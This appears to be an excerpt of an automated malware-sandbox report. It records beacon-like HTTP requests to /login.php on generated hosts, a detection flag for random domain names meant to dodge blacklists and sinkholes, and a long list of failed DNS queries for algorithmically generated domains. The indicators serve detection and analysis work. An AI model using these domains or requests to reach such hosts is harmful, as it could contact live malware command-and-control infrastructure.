Source: HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyfuv.com Cookie: snkz=66.23.206.109; btst=1885748a88d570f6bc1d4997b747b719|66.23.206.109|1731344905|1731344858|23|2|0
Source: HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com
Source: HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lymyxid.com Cookie: snkz=66.23.206.109; btst=efdffc983bdd66cc7891294af6cfad3b|66.23.206.109|1731344906|1731344858|24|2|0
Source: HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galyqaz.com Cookie: vsid=910vr4788904590031611
Source: HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com
Source: HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com
Source: HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com
Source: HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
Source: HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com Cookie: parking_session=a5a88ea0-36a7-4e4e-8f60-5d1139b1df65
Queries random domain names (often used to prevent blacklisting and sinkholes)
Source: unknownDNS traffic detected: English language letter frequency does not match the domain names
Tries to resolve many domain names, but no domain seems valid
Source: unknownDNS traffic detected: query: puzypug.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexysig.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumytup.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahynus.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykyjux.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebylov.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofydac.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupytyl.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupydig.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexyriq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujyxyl.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufybyv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volydot.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacyvah.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetytug.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvyxil.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufymyg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purywop.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyrygyn.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonymuf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofyqit.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzyxyv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopyret.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujymip.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedyvuv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galypyh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galyfyb.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexyxuv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqyzuw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumywaq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqyhuz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowydef.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqysag.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volykit.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonycum.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekyxul.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebyrip.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacykeh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowybof.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadyneh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxymed.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupypep.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyryfyd.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujybig.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexyvoq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqyhup.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacyhis.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegyrol.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysymux.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadypuw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqyvob.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekyheq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekykup.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocycuc.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyryxij.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexykug.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volyzef.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqyfaq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexyfel.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofygum.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahykih.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqykab.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonyzuf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvymul.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedyveg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofykoc.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopycom.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykygaj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacykub.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojygok.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowykaf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowymyk.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymyvin.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetyrap.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonydik.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofymik.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatycoh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvyjop.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purydyv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowyzuk.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatyqih.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegytyv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojykom.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopykak.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxylor.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofygaf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymylyr.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacyhez.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedynaq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujygaq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatydaw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygywor.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysywon.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galyquw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysyvud.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysysod.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadyrab.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegysoq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegynap.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufygug.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysyfyj.com replaycode: Server failure (2)
Source: unknownDNS traffic detected: query: puvyliv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatyvyz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetyfop.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedyfyq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purycap.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purydip.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadyveb.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofybyf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetyvil.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvylod.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purycul.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadyfuh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonyjim.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonyqok.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyrytod.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volypum.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykymox.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galyhiw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedysov.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacypyz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupypiv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqyxov.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purytyg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganydiw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyryvex.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzyjoq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykyvod.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufyjuq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonypyf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqyzoh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqykog.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowydic.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocyrom.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganyqow.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopyjuf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumyjig.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetylyv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volymum.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumybal.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocyzek.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumymuv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyrytun.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymymud.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetyquq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganycuh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galyvas.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykynyj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexyqog.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volymaf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopybyt.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvylyn.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahyhob.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebysul.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacydib.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocymut.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatyzys.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadyduz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupygel.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebytiq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupymyp.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatynes.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volyqat.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzyjyg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegyqaq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupycuv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvywed.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahypus.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojyjof.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahycib.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadyzyh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexylup.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojymic.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumypog.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonyryc.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzybep.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganyzas.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedyhyl.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowyjut.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufydep.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadyhyw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysytyr.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxyfar.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufypiq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebyrev.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacynuz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykytej.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowycac.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purypol.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxyjun.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganykaz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojyrak.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyryjir.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvytuq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocyjic.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqyqiv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadyvis.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujypup.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegykiq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykygur.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatyduh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebyhuq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganypih.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedyrag.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowypit.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahyqub.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacyryw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekyqyl.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyryled.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqynyw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puryjil.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxyjaj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupywog.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqyfah.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegyhev.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocydof.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonygec.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetytav.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purygeg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacyqys.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqytal.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekysip.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykymyr.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebynyg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojyjyc.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujygul.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzytap.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadyfob.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqytup.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufywil.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatycyb.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqycos.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxyxyd.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowygem.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqypew.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekyhil.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegylep.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetyvep.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahynaz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexykaq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygyfir.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacycus.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumycug.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebyxyq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganyriz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galycuw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofymem.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyrymuj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebyfav.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxywer.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvyxyj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykysix.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojycif.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymyjon.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegyxug.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocypyt.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebyqil.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvygyq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvydov.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujyteq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymyfoj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopydum.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galyros.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvytuj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekykev.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujymel.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedyfog.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvybeg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedyxip.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujydag.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonybat.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedysyp.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopymyc.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopygat.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganyrys.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojybek.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygyvar.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexytep.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufydul.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatyviw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysynur.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadyquz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzylol.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojyquf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puryxag.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymytar.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymytux.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetykol.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocygyk.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysynaj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedytul.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujywiv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekyrov.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumyxiv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopyqim.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufycol.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymyner.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyryxen.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocyqaf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumylel.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacyzuz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufytev.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumytol.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volykyc.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volyrac.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebykul.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupybul.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatyfaz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysyxux.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahyzez.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupyxup.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymywaj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyrynad.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykyxur.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacyroh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetysal.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahyhys.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganyhuh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzyciq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowyrym.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purypyq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacyzaw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysylej.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galynab.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofypuk.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujyjup.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galykiz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqyqis.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqynel.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymysud.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puryxuq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galyzeb.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxywij.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purybav.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufymoq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volygyf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqycyz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqylyl.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumyxep.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebyvop.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvyjyr.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzywel.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekyvav.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupylaq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebyteg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumypyv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzymig.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujyjav.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvytan.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegyfyp.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvymir.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galydoz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymylij.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacyqob.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygysij.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupyboq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvyfad.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowypek.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvyjox.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymyxex.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacyfew.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujycov.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purymuq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofyjuk.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetynev.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxygud.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetysuq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyrywax.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopydek.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqysuv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykyjad.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygyged.com replaycode: Name error (3)
